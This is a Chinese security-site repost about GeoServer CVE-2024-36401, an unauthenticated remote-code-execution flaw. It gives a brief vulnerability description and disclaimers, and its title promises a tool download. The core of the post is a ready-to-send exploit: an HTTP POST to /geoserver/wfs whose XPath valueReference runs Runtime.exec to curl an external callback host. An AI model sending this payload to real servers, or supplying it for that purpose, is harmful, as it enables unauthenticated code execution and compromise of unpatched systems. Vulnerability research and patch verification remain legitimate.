GeoServer CVE-2024-36401 附工具下载

admin
admin
admin
139080
文章
114
评论
2024年8月26日23:14:12评论83 views字数 883阅读2分56秒阅读模式
本公众号所发布的文章及工具只用于网络安全交流学习,请勿进行非法渗透。

GeoServer CVE-2024-36401 附工具下载

漏洞详情

GeoServerOpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据允许用户对特征数据进行更新、删除、插入操作。GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前未登录的任意用户可以通过构造恶意OGC请求,在默认安装的服务器中执行XPath表达式进而利用执行Apache Commons Jxpath提供的功能执行任意代码。

GeoServer CVE-2024-36401 附工具下载

EXP/POC:

注意   typeNames='sf:archsites'



POST /geoserver/wfs HTTP/1.1Host: x.x.x.x:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36Content-Type: application/xmlContent-Length: 390

<wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0'>  <wfs:Query typeNames='sf:archsites'/>  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl 123.go8o0k83qmfdt7zwl3ne8brdq4wvkt8i.oastify.com')</wfs:valueReference></wfs:GetPropertyValue>

原文始发于微信公众号(清澜安全实验室):GeoServer CVE-2024-36401 附工具下载

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月26日23:14:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   GeoServer CVE-2024-36401 附工具下载https://cn-sec.com/archives/3096125.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息